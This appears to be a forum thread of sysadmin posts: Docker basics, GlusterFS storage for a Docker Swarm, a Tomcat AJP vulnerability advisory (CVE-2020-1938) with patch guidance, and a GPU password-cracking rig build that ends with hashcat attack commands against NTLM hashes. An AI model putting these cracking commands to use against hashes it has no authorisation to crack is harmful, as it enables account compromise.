    The output should be similar to the following, showing that the service is active and running:

    Output
    ● docker.service - Docker Application Container Engine
       Loaded: loaded (/lib/systemd/system/docker.service; enabled; vendor preset: enabled)
       Active: active (running) since Sun 2016-05-01 06:53:52 CDT; 1 weeks 3 days ago
         Docs: https://docs.docker.com
     Main PID: 749 (docker)

    Lastly, make sure it starts at every server reboot:

       sudo systemctl enable docker

    Installing Docker now gives you not just the Docker service (daemon) but also the docker command line utility, or the Docker client. We’ll explore how to use the docker command later in this tutorial.

    Step 2 — Executing Docker Command Without Sudo (Optional)

    By default, running the docker command requires root privileges — that is, you have to prefix the command with sudo. It can also be run by a user in the docker group, which is automatically created during the installation of Docker. If you attempt to run the docker command without prefixing it with sudo or without being in the docker group, you’ll get an output like this:

    Output
    docker: Cannot connect to the Docker daemon. Is the docker daemon running on this host?.
    See 'docker run --help'.

    If you want to avoid typing sudo whenever you run the docker command, add your username to the docker group:

       sudo usermod -aG docker $(whoami)

    You will need to log out of the Droplet and back in as the same user to enable this change.

    If you need to add a user to the docker group that you’re not logged in as, declare that username explicitly using:

       sudo usermod -aG docker username

    The rest of this article assumes you are running the docker command as a user in the docker user group. If you choose not to, please prepend the commands with sudo.

    Step 3 — Using the Docker Command

    With Docker installed and working, now’s the time to become familiar with the command line utility. Using docker consists of passing it a chain of options and subcommands followed by arguments. The syntax takes this form:

       docker [option] [command] [arguments]

    To view all available subcommands, type:

       docker

    As of Docker 1.11.1, the complete list of available subcommands includes:

    Output
        attach    Attach to a running container
        build     Build an image from a Dockerfile
        commit    Create a new image from a container's changes
        cp        Copy files/folders between a container and the local filesystem
        create    Create a new container
        diff      Inspect changes on a container's filesystem
        events    Get real time events from the server
        exec      Run a command in a running container
        export    Export a container's filesystem as a tar archive
        history   Show the history of an image
        images    List images
        import    Import the contents from a tarball to create a filesystem image
        info      Display system-wide information
        inspect   Return low-level information on a container or image
        kill      Kill a running container
        load      Load an image from a tar archive or STDIN
        login     Log in to a Docker registry
        logout    Log out from a Docker registry
        logs      Fetch the logs of a container
        network   Manage Docker networks
        pause     Pause all processes within a container
        port      List port mappings or a specific mapping for the CONTAINER
        ps        List containers
        pull      Pull an image or a repository from a registry
        push      Push an image or a repository to a registry
        rename    Rename a container
        restart   Restart a container
        rm        Remove one or more containers
        rmi       Remove one or more images
        run       Run a command in a new container
        save      Save one or more images to a tar archive
        search    Search the Docker Hub for images
        start     Start one or more stopped containers
        stats     Display a live stream of container(s) resource usage statistics
        stop      Stop a running container
        tag       Tag an image into a repository
        top       Display the running processes of a container
        unpause   Unpause all processes within a container
        update    Update configuration of one or more containers
        version   Show the Docker version information
        volume    Manage Docker volumes
        wait      Block until a container stops, then print its exit code

    To view the switches available to a specific command, type:

       docker docker-subcommand --help

    To view system-wide information, use:

       docker info

    Step 4 — Working with Docker Images

    Docker containers are run from Docker images. By default, it pulls these images from Docker Hub, a Docker registry managed by Docker, the company behind the Docker project. Anybody can build and host their Docker images on Docker Hub, so most applications and Linux distributions you’ll need to run Docker containers have images that are hosted on Docker Hub.

    To check whether you can access and download images from Docker Hub, type:

       docker run hello-world

    The output, which should include the following, indicates that Docker is working correctly:

    Output
    Hello from Docker.
    This message shows that your installation appears to be working correctly.
    ...

    You can search for images available on Docker Hub by using the docker command with the search subcommand. For example, to search for the CentOS image, type:

       docker search centos

    The command will search Docker Hub and return a listing of all images whose names match the search string. In this case, the output will be similar to this:

    Output
    NAME                            DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
    centos                          The official build of CentOS.                   2224      [OK]       
    jdeathe/centos-ssh              CentOS-6 6.7 x86_64 / CentOS-7 7.2.1511 x8...   22                   [OK]
    jdeathe/centos-ssh-apache-php   CentOS-6 6.7 x86_64 / Apache / PHP / PHP M...   17                   [OK]
    million12/centos-supervisor     Base CentOS-7 with supervisord launcher, h...   11                   [OK]
    nimmis/java-centos              This is docker images of CentOS 7 with dif...   10                   [OK]
    torusware/speedus-centos        Always updated official CentOS docker imag...   8                    [OK]
    nickistre/centos-lamp           LAMP on centos setup                            3                    [OK]
    
    ...

    In the OFFICIAL column, OK indicates an image built and supported by the company behind the project. Once you’ve identified the image that you would like to use, you can download it to your computer using the pull subcommand, like so:

       docker pull centos

    After an image has been downloaded, you may then run a container using the downloaded image with the run subcommand. If an image has not been downloaded when docker is executed with the run subcommand, the Docker client will first download the image, then run a container using it:

       docker run centos

    To see the images that have been downloaded to your computer, type:

       docker images

    The output should look similar to the following:

    Output
    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
    centos              latest              778a53015523        5 weeks ago         196.7 MB
    hello-world         latest              94df4f0ce8a4        2 weeks ago         967 B

    As you’ll see later in this tutorial, images that you use to run containers can be modified and used to generate new images, which may then be uploaded (pushed is the technical term) to Docker Hub or other Docker registries.

    Step 5 — Running a Docker Container

    The hello-world container you ran in the previous step is an example of a container that runs and exits, after emitting a test message. Containers, however, can be much more useful than that, and they can be interactive. After all, they are similar to virtual machines, only more resource-friendly.

    As an example, let’s run a container using the latest image of CentOS. The combination of the -i and -t switches gives you interactive shell access into the container:

       docker run -it centos

    Your command prompt should change to reflect the fact that you’re now working inside the container and should take this form:

    Output
    [root@59839a1b7de2 /]#

    Important: Note the container id in the command prompt. In the above example, it is 59839a1b7de2.

    Now you may run any command inside the container. For example, let’s install MariaDB server in the running container. No need to prefix any command with sudo, because you’re operating inside the container with root privileges:

       yum install mariadb-server

    Step 6 — Committing Changes in a Container to a Docker Image

    When you start up a Docker image, you can create, modify, and delete files just like you can with a virtual machine. The changes that you make will only apply to that container. You can start and stop it, but once you destroy it with the docker rm command, the changes will be lost for good.

    This section shows you how to save the state of a container as a new Docker image.

    After installing MariaDB server inside the CentOS container, you now have a container running off an image, but the container is different from the image you used to create it.

    To save the state of the container as a new image, first exit from it:

       exit

    Then commit the changes to a new Docker image instance using the following command. The -m switch is for the commit message that helps you and others know what changes you made, while -a is used to specify the author. The container ID is the one you noted earlier in the tutorial when you started the interactive docker session. Unless you created additional repositories on Docker Hub, the repository is usually your Docker Hub username:

       docker commit -m "What did you do to the image" -a "Author Name" container-id repository/new_image_name

    For example:

       docker commit -m "added mariadb-server" -a "Sunday Ogwu-Chinuwa" 59839a1b7de2 finid/centos-mariadb

    Note: When you commit an image, the new image is saved locally, that is, on your computer. Later in this tutorial, you’ll learn how to push an image to a Docker registry like Docker Hub so that it may be accessed and used by you and others.

    After that operation has completed, listing the Docker images now on your computer should show the new image, as well as the old one that it was derived from:

       docker images

    The output should be of this sort:

    Output
    REPOSITORY             TAG                 IMAGE ID            CREATED             SIZE
    finid/centos-mariadb   latest              23390430ec73        6 seconds ago       424.6 MB
    centos                 latest              778a53015523        5 weeks ago         196.7 MB
    hello-world            latest              94df4f0ce8a4        2 weeks ago         967 B

    In the above example, centos-mariadb is the new image, which was derived from the existing CentOS image from Docker Hub. The size difference reflects the changes that were made. And in this example, the change was that MariaDB server was installed. So next time you need to run a container using CentOS with MariaDB server pre-installed, you can just use the new image. Images may also be built from what’s called a Dockerfile. But that’s a very involved process that’s well outside the scope of this article. We’ll explore that in a future article.
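
    Just to give a flavor of that alternative, here is a minimal, illustrative Dockerfile that would produce roughly the same image as the commit above (not covered further in this article):

    # Build with: docker build -t finid/centos-mariadb .
    FROM centos
    RUN yum install -y mariadb-server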

    Step 7 — Listing Docker Containers

    After using Docker for a while, you’ll have many active (running) and inactive containers on your computer. To view the active ones, use:

       docker ps

    You will see output similar to the following:

    Output
    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
    f7c79cc556dd        centos              "/bin/bash"         3 hours ago         Up 3 hours                              silly_spence

    To view all containers — active and inactive, pass it the -a switch:

       docker ps -a

    To view the latest container you created, pass it the -l switch:

       docker ps -l

    Stopping a running or active container is as simple as typing:

       docker stop container-id

    The container-id can be found in the output from the docker ps command.

    Step 8 — Pushing Docker Images to a Docker Repository

    The next logical step after creating a new image from an existing image is to share it with a select few of your friends, the whole world on Docker Hub, or another Docker registry that you have access to. To push an image to Docker Hub or any other Docker registry, you must have an account there.

    This section shows you how to push a Docker image to Docker Hub.

    To create an account on Docker Hub, register at Docker Hub. Afterwards, to push your image, first log into Docker Hub. You’ll be prompted to authenticate:

       docker login -u docker-registry-username

    If you specified the correct password, authentication should succeed. Then you may push your own image using:

       docker push docker-registry-username/docker-image-name

    It will take some time to complete, and when completed, the output will be of this sort:

    Output
    The push refers to a repository [docker.io/finid/centos-mariadb]
    670194edfaf5: Pushed 
    5f70bf18a086: Mounted from library/centos 
    6a6c96337be1: Mounted from library/centos
    
    ...

    After pushing an image to a registry, it should be listed on your account’s dashboard, like that shown in the image below.

    [attachment:5e6ad7111abcb]

    If a push attempt results in an error of this sort, then you likely did not log in:

    Output
    The push refers to a repository [docker.io/finid/centos-mariadb]
    e3fbbfb44187: Preparing
    5f70bf18a086: Preparing
    a3b5c80a4eba: Preparing
    7f18b442972b: Preparing
    3ce512daaf78: Preparing
    7aae4540b42d: Waiting
    unauthorized: authentication required

    Log in, then repeat the push attempt.

  8. Fri Mar 6 22:00:16 2020
    Men in Black started the conversation Docker Swarm Persistent Storage.

    Unless you’ve been living under a rock, you should need no explanation what Docker is. Using Docker over the last year has drastically improved my deployment ease, and coupled with GitLab’s CI/CD it has made deployment extremely easy. Mind you, not all our applications being deployed have the same requirements; some are extremely simple and others are extraordinarily complex. So when we start a new project we have a base docker build to begin from, and based on the application’s requirements we add/remove as needed.

    A little about Docker Swarm

    For the large majority of our applications, having a volume associated with the deployed containers and storing information in the database fits the applications’ needs.

    In front of all our applications we used to use Docker Flow Proxy to quickly integrate our application into our deployed environment and assign it a subdomain based on its service. For a few months we experienced issues with the proxy hanging up, resources not being cleared, and lots of dropped connections. Since then I have rebuilt our docker infrastructure, and now we use Traefik for our proxy routing and it has been absolutely amazing! It’s extremely fast, very robust and extensible, and easy to manipulate to fit your needs. Heck, before even deploying it I was using docker-compose to build a local network proxy to ensure it was what we needed. While Traefik was running in compose I was hitting domains such as http://whoami.localhost/ and this was a great way to learn the basic configuration before pushing it into a staging/production swarm environment. (Explaining how we got started with Traefik is a whole other post of its own.)

    Now back to our docker swarm. I know the big thing right now is Kubernetes, but every organization has its specific needs for its different environments, application types, and deployment mechanisms. In my opinion the current docker environment we’ve got running right now is pretty robust. We’ve got dozens of nodes, a number of deployment environments (cybersec, staging, and production), dozens of applications running at once, and some of them requiring a number of services in order to function properly.

    A few of the things that won me over on docker swarm in the first place are its load balancing capabilities, its fault tolerance, and the self-healing mechanism it uses in case a container crashes, a node locks up or drops, or any number of other issues. (We’ve had a number of servers go down due to networking issues or a rack server crapping out, and with the docker swarm running you could never even tell we were having issues as an end user of our applications.)

    (Below is an image showing traffic hitting the swarm. If you have an application replicated upon deployment, traffic will be distributed amongst the nodes to prevent bottlenecks.)

    -image-

    Why would you need persistent storage?

    Since the majority of our applications are data oriented (with most of them hitting several databases in a single request), we hadn’t really had to worry about persistent storage. This is because once we deployed the applications, their volumes held all of their required assets and any data they needed was fetched from the database.

    The easiest way to explain volumes is this: when a container is deployed to a node, the node will (if specified) put aside a section of storage specifically for that container. For example, say we have an application called DogTracker that was deployed on nodes A and B. This application can create and store files in its volumes on those nodes. But what happens when there’s an issue with the container on node A and the container cycles to node C? The data created by the container is left in the volume on node A and is no longer available until that application’s container cycles back to node A.

    And from this arises the problem we began to face. We were starting to develop applications that required files to be shared amongst each other. We also have numerous applications that require files to be saved and distributed without them being dumped into the database as a blob. And these files needed to be available without cycling volumes and/or dumping them into the containers during build time. Because of this, we needed some form of persistent and distributed file storage across our containers.

    (Below is an image showing how a docker swarm’s volumes are oriented)

    -image-

    How we got around this!

    Now in this day and age there have got to be ways to get around this. There are at least 101 ways to do just about anything, and it doesn’t always have to be the newest, shiniest toy everyone’s using. I know saying this while using Docker is kind of a hypocritical statement, but shared file systems have been around for decades. You’ve been able to mount network drives, ftp drives, have organizational shared folders; the list can go on for days.

    But the big question is: how do we get a container to mount a local shared folder or distribute volumes across all swarm nodes? Well, there’s a whole list of distributed filesystems and modern storage mechanisms in the docker documentation. Below is a list of the top recommended alternatives I found for distributed file systems or NFSs in the docker ecosystem around container development.

    I know you’re wondering why we didn’t use S3, DigitalOcean Spaces, GCS, or some other cloud storage. But internally we have a finite amount of resources, and we can spin up VMs and be rolling in a matter of moments, especially considering we have built a number of Ansible playbooks to quickly provision our servers. Plus, why throw resources out on the cloud when it’s not needed? Especially when we can metaphorically create our own network based file system and have our own cloud based storage system.

    (Below is an image showing how we want to distribute file system changes)

    -image-

    After looking at several methods I settled on GlusterFS, a scalable network filesystem. Don’t get me wrong, a number of the other alternatives are pretty groundbreaking, and some amazing work has been put into developing them. But I don’t have thousands of dollars to drop on setting up a network file system that may or may not work for our needs. There were also several others that I did look pretty heavily into, such as StorageOS and Ceph. With StorageOS I really liked the idea of a container based file system that stores, synchronizes, and distributes files to all other storage nodes within the swarm. And it may just be me, but Ceph looked like the prime competitor to Gluster. They both have their high points and seem to work very reliably. But at the time it wasn’t for me, and after using Gluster for a few months, I believe that I made the right choice and it has served its purpose well.

    [attachment:5e6268fd50592]

    Gluster Notes

    (Note: The following steps are to be used on a Debian/Ubuntu based install.)

    Documentation for using Gluster can be found in their docs. Their installation instructions are very brief and explain how to install the gluster packages, but they don’t go into depth on how to set up a Gluster network. I also suggest thoroughly reading through the documentation to understand Gluster volumes, bricks, pools, etc.

    Installing GlusterFS

    To begin, you will need to list all of the Docker Swarm nodes you wish to connect in the /etc/hosts files of each server. On linux (Debian/Ubuntu), you can get the current node’s IP address by running the following command: hostname -I | awk '{print $1}'

    (The majority of the commands listed below need to be run on each and every node simultaneously unless specified. To do this I opened a number of terminal tabs and connected to each server in a different tab.)

    # /etc/hosts
    10.10.10.1 staging1.example.com staging1
    10.10.10.2 staging2.example.com staging2
    10.10.10.3 staging3.example.com staging3
    10.10.10.4 staging4.example.com staging4
    10.10.10.5 staging5.example.com staging5
    # Update & Upgrade all installed packages
    apt-get update && apt-get upgrade -y
    
    # Install gluster dependencies
    sudo apt-get install python-software-properties -y

    Add the GlusterFS PPA package to the list of trusted packages so it can be installed from a community repository.

    sudo add-apt-repository ppa:gluster/glusterfs-3.10
    sudo apt-get update

    Now let’s install gluster:

    sudo apt-get install -y glusterfs-server attr

    Before starting the Gluster service, I had to copy some files into systemd (you may or may not have to do this). Since Gluster was developed by RedHat primarily for RedHat and CentOS, I had a few issues starting the system service on Ubuntu.

    sudo cp /etc/init.d/glusterfs-server /etc/systemd/system/

    Let’s start and enable the glusterfs system service

    systemctl enable glusterfs-server; systemctl start glusterfs-server

    This step isn’t necessary, but I like to verify that the service is enabled and running:

    # Verify the gluster service is enabled
    systemctl is-enabled glusterfs-server
    # Check the system service status of the gluster-server
    systemctl status glusterfs-server

    If for some reason you haven’t done this yet, each and every node should have its own SSH key generated.

    (The only reason I can think of why they wouldn’t have different keys is if a VM was provisioned and then cloned for similar use across a swarm.)

    # This is to generate a very basic SSH key, you may want to specify a key type such as ED25519 or bit length if required.
    ssh-keygen -t rsa

    Depending on your Docker Swarm environment and which server you’re running as a manager, you’ll probably want one of the node managers to also be a gluster node manager as well. I’m going to say server staging1 is one of our node managers, so on this server we’re going to probe all other gluster nodes to add them to the gluster pool. (Probing them is essentially the manager telling all servers on this list to connect to each other.)

    gluster peer probe staging1; gluster peer probe staging2; gluster peer probe staging3; gluster peer probe staging4; gluster peer probe staging5;

    It’s not required, but probably good practice to ensure all of the nodes have connected to the pool before setting up the file system.

    gluster pool list
    
    # => You should get results similar to the following
    UUID					Hostname 	State
    a8136a2b-a2e3-437d-a003-b7516df9520e	staging3 	Connected
    2a2f93f6-782c-11e9-8f9e-2a86e4085a59	staging2 	Connected
    79cb7ec0-f337-4798-bde9-dbf148f0da3b	staging4 	Connected
    3cfc23e6-782c-11e9-8f9e-2a86e4085a59	staging5 	Connected
    571bed3f-e4df-4386-bd46-3df6e3e8479f	localhost	Connected
    
    # You can also run the following command to another set of results
    gluster peer status

    Now let’s create the gluster data storage directories. (It’s very important you do this on every node; this directory is where all gluster nodes will store the distributed files locally.)

    sudo mkdir -p /gluster/brick

    Now let’s create a gluster volume across all nodes (again, run this on the master node/node manager).

    sudo gluster volume create staging-gfs replica 5 staging1:/gluster/brick staging2:/gluster/brick staging3:/gluster/brick staging4:/gluster/brick staging5:/gluster/brick force

    The next step is to initialize the glusterFS to begin synchronizing across all nodes.

    gluster volume start staging-gfs

    This step is also not required, but I prefer to verify the gluster volume replicated across all of the designated nodes.

    gluster volume info
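
    For the volume created above, the output should look roughly like the following (a sketch; the exact fields vary by Gluster version):

    Volume Name: staging-gfs
    Type: Replicate
    Status: Started
    Number of Bricks: 1 x 5 = 5
    Bricks:
    Brick1: staging1:/gluster/brick
    Brick2: staging2:/gluster/brick
    ...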

    Now let’s ensure gluster mounts the /mnt directory as its shared directory, especially on a reboot. (It’s important to run these commands on all gluster nodes.)

    sudo umount /mnt
    echo 'localhost:/staging-gfs /mnt glusterfs defaults,_netdev,backupvolfile-server=localhost 0 0' | sudo tee -a /etc/fstab
    sudo mount.glusterfs localhost:/staging-gfs /mnt
    sudo chown -R root:docker /mnt

    (You may have noticed the setting of file permissions using chown -R root:docker; this is to ensure docker will have read/write access to the files in the specified directory.)

    If for some reason you’ve already deployed your staging gluster-fs and need to remount the staging-gfs volume you can run the following command. Otherwise you should be able to skip this step.

    sudo umount /mnt; sudo mount.glusterfs localhost:/staging-gfs /mnt; sudo chown -R root:docker /mnt

    Let’s list all of our mounted partitions and ensure that the staging-gfs is listed.

    df -h
    
    # => staging-gfs should be listed in the partitions/disks listed
    localhost:/staging-gfs              63G   13G   48G  21% /mnt

    Now that all of the work is pretty much done, comes the fun part: let’s test to make sure it all works. Let’s cd into the /mnt directory and create a few files to make sure they sync across all nodes. (I know this is one of the first things I wanted to try out.) You can run one of the following commands to generate a random file in the /mnt directory. Depending on your servers and network connections, the file should sync across all nodes almost instantly. The way I tested this: I was in the /mnt directory on several nodes in several terminals, and as soon as I issued the command I ran ls in the other tabs. Depending on the file size, it may not sync across all nodes instantly, but it is at least accessible right away.

    # This creates a 24MB file full of zeros
    dd if=/dev/zero of=output.dat bs=24M  count=1
    
    # Creates a 2MB file of random characters
    dd if=/dev/urandom of=output.log bs=1M count=2
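
    Then, on any of the other nodes, the new files should show up in the shared mount almost immediately:

    # Run on another node; output.dat and output.log should be listed
    ls -lh /mnt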

    Using GlusterFS with Docker

    Now that all the fun stuff is done, if you haven’t looked at docker volumes or bind mounts yet, now would probably be a good time. Usually docker will store a volume’s contents in a folder structure similar to the following: /var/lib/docker/volumes/DogTracker/_data.

    But in your docker-compose.yml or docker-stack.yml you can specify specific mount points for the docker volumes. If you look at the following YAML snippet, you will notice I’m saying to store the container’s /opt/couchdb/data directory on the local mount point /mnt/staging_couch_db.

    version: '3.7'
    services:
      couchdb:
        image: couchdb:2.3.0
        volumes:
          - type: bind
            source: /mnt/staging_couch_db
            target: /opt/couchdb/data
        networks:
          - internal
        deploy:
          resources:
            limits:
              cpus: '0.30'
              memory: 512M
            reservations:
              cpus: '0.15'
              memory: 256M

    Now, as we had previously demonstrated, any file(s) saved, created, and/or deleted in the /mnt directory will be synchronized across all of the GlusterFS nodes.

    I’d just like to mention this may not work for everyone, but this is the method that worked best for us. We’ve been running a number of different Gluster networks for several months now with no issues thus far.

  9. Tue Mar 3 10:38:52 2020

    Recently, a new vulnerability on Apache Tomcat AJP connector was disclosed.

    The flaw was discovered by a security researcher of Chaitin Tech [1] and allows a remote attacker to read any webapp’s files or include a file.

    The AJP Connector

    The AJP Connector [3] is generally used to manage (internal) requests, usually on port 8009, coming for example from an Apache HTTP Server.
    The vulnerability (CVE-2020-1938) could be remotely exploited if port 8009 is publicly exposed.

    According to a tweet by Joao Matos [2], the vulnerability is not a default RCE (Remote Command Execution) but an LFI (Local File Inclusion) that can be turned into RCE:

    CVE-2020-1938 is NOT a default Remote Code Execution vul. It is a LFI. So, IF you can:

    1. upload files via an APP feature &
    2. these files are saved inside the document root (eg. webapps/APP/… &
    3. reach the AJP port directly;

    Thus, it can be turned in RCE.

    A Proof-of-Concept for the vulnerability has been released on GitHub, without any additional details.
    Furthermore, the researcher also published an “online detection tool” useful to remotely check for the vulnerability.

    [attachment:5e5dd0b43629b]

    Which Tomcat versions are affected?

    • Tomcat 6 (no longer maintained)
    • Tomcat 7.x < 7.0.100
    • Tomcat 8.x < 8.5.51
    • Tomcat 9.x < 9.0.31

    Is there a fix?

    Apache Tomcat has officially released versions 9.0.31, 8.5.51, and 7.0.100 to fix this vulnerability.
    To fix this vulnerability correctly, you first need to determine whether the Tomcat AJP Connector service is used in your server environment (see the check after this list):
    • If no cluster or reverse proxy is used, you can basically determine that AJP is not used.
    • Otherwise, you need to figure out if the cluster or reverse proxy is communicating with the Tomcat AJP Connector service.
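
    A quick way to check is to look for an enabled AJP connector in Tomcat’s server.xml (a hedged sketch; the path depends on your installation):

    grep -n 'protocol="AJP' /opt/tomcat/conf/server.xml
    # An uncommented line like this means AJP is listening (by default on 8009):
    #   <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />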

    For additional details about fixing, please refer to the advisory.
    As usual, update ASAP (and check port 8009 exposure)!

    References

  10. 7 months ago
    Tue Feb 11 20:56:03 2020
    Men in Black started the conversation How to build a (2nd) 8 GPU password cracker.

    [attachment:5e42b0e46185a]

    Background

    In February 2017, we took our first shot at upgrading our old open-frame 6 GPU cracker (NVIDIA 970). It served us well, but we needed to crack 8 and 9-character NTLM hashes within hours and not days. The 970s were not cutting it and cooling was always a challenge. Our original 8 GPU rig was designed to put our cooling issues to rest.

    Speaking of cooling issues, we enjoyed reading all of the comments on our 2017 build. Everyone seemed convinced that we were about to melt down our data center. We thank everyone for their concern (and entertainment).

    • "the graphics cards are too close!"
    • "nonsense. GTX? LOL. No riser card? LOL good luck."

    To address cooling, we specifically selected (at the time) NVIDIA 1080 Founders Edition cards due to their 'in the front and out the rear' centrifugal fan design. A couple months after our initial blog, we upgraded from NVIDIA 1080 to NVIDIA 1080 Ti cards. And admittedly, we later found that the extra memory was useful when cracking with large (>10GB) wordlists.

    OK, But Why?

    Shortly after building our original 8 GPU cracker, we took it to RSA and used it as part of a narrated live hacking demo. Our booth was a play on the Warlock’s command center where we hacked Evil Corp from the comfort of Ma’s Basement. (yeah, a bit unique for RSA…)

    [attachment:5e42b14ad8bd1]

    Shopping List

    You have a little flexibility here, but we’d strongly suggest the Tyan chassis and Founders Edition NVIDIA cards. The Tyan comes with the motherboard, power supplies (3x), and arrives all cabled up and ready to build. We went with a 4TB SSD to hold some very large wordlists but did not setup RAID with a 2nd drive (yet). Higher CPU speeds and memory mostly help with dictionary attacks; therefore a different build may be better suited for non-GPU cracking.

    Hardware

    • Tyan B7079F77CV10HR-N
    • 2x Intel Xeon E5-2630 V4 Broadwell-EP 2.2 GHz (LGA 2011-3 85W)

    +Be sure to get V3 or V4 (V4 recommended to support DDR4 2400 RAM)! *We learned the hard way!

    • 128GB (4 x 32GB) DDR4 2400 (PC4 19200) 288-Pin 1.2V ECC Registered DIMM
    • Samsung EVO 4TB 2.5” SSD

    Software

    • Ubuntu - 18.04 LTS server (x64)
    • hashcat - www.hashcat.net
    • hashview - www.hashview.io

    Cost

    • Depends heavily on the current market price of GPUs. ($12K-$17K)
    • At least the software is all free! And who can put a price on cracking performance?

    The Build

    Despite being a hash munching monster and weighing nearly 100 lbs. when assembled, this build is easy enough for a novice.

    [attachment:5e42b1b6577c8]

    Hardware Build Notes

    • Normally I like to install the CPU(s) first, but I ordered the wrong ones and had to install them 3 days later. Be sure to get V3 or V4 XEON E5 processors, V2 is cheaper but ‘it don’t fit’.

    +When installing the (included) Tyan heat-sinks, we added a little extra thermal paste even though the heat-sinks already have some on the bottom.

    • Install memory starting in Banks A and E (see diagram above). CPU 0 and CPU 1 each require matching memory. Memory Banks A-D are for CPU 0 and Memory Banks E-H are for CPU 1. We added 2x 32GB in Bank A and 2x 32GB in Bank E for a total of 128GB RAM.
    • Install hard drive for (Linux) operating system. We chose a 4TB SSD drive to ensure plenty of storage for large wordlists and optimum read/write performance. The chassis has 10 slots so feel free to go crazy with RAID and storage if you wish.
    • Prep all 8 GPU cards by installing the included Tyan GPU mounting brackets. They are probably not required, but they ensure a good seat.
    • Install GPU cards. Each NVIDIA 1080 Ti requires 2 power connections per card. The regular 1080 cards only require 1 if you decide not to go the ‘Ti’ route. Again, Tyan includes all necessary power cables with the chassis.
    • Connect or insert OS installation media. I hate dealing with issues related to booting and burning ISOs written to USB flash; so we went with a DVD install (USB attached drive).
    • Connect all 3 power cords to the chassis and connect the other end of each cord to a dedicated 15A or 20A circuit. While cracking, the first 2 power supplies draw 700-900W, with less on the 3rd. They do like dedicated circuits though; it is easy to trip breakers if anything else is sharing the circuit.

    Software Build Notes

    Everyone has their own preferred operating system and configuration, so we’ve decided not to go telling you how to do your thing. If you are new to installing and using a Linux operating system, we did include a complete walk-through in our February 2017 post: How to build a 8 GPU password cracker.

    The basic software build steps are as follows:

    • Install your preferred Linux OS. We chose Ubuntu 18.04 LTS (64 bit - server). Fully update and upgrade.
    • Prepare for updated NVIDIA drivers:

    +Blacklist the generic NVIDIA Nouveau driver

    sudo bash -c "echo blacklist nouveau > /etc/modprobe.d/blacklist-nvidia-nouveau.conf"
    sudo bash -c "echo options nouveau modeset=0 >> /etc/modprobe.d/blacklist-nvidia-nouveau.conf"
    sudo update-initramfs -u
    sudo reboot

    +Add 32-bit headers

    sudo dpkg --add-architecture i386
    sudo apt-get update
    sudo apt-get install build-essential libc6:i386

    +Download, unzip and install the latest NVIDIA driver from http://www.nvidia.com/Download/index.aspx

    [attachment:5e42b2434baa9]

    sudo ./NVIDIA*.run
    sudo reboot

    The Outcome

    Go ahead, run a benchmark with hashcat to make sure everything works!

    ./hashcat-5.0.0/hashcat64.bin -m 1000 -b
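
    Once the benchmark looks sane, real jobs follow the same pattern. Two hedged examples with hypothetical file names; -m 1000 selects NTLM:

    # Dictionary attack against NTLM hashes
    ./hashcat-5.0.0/hashcat64.bin -m 1000 -a 0 ntlm-hashes.txt wordlist.txt

    # Mask attack: every 8-character password from the full 95-character keyspace
    ./hashcat-5.0.0/hashcat64.bin -m 1000 -a 3 ntlm-hashes.txt ?a?a?a?a?a?a?a?a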
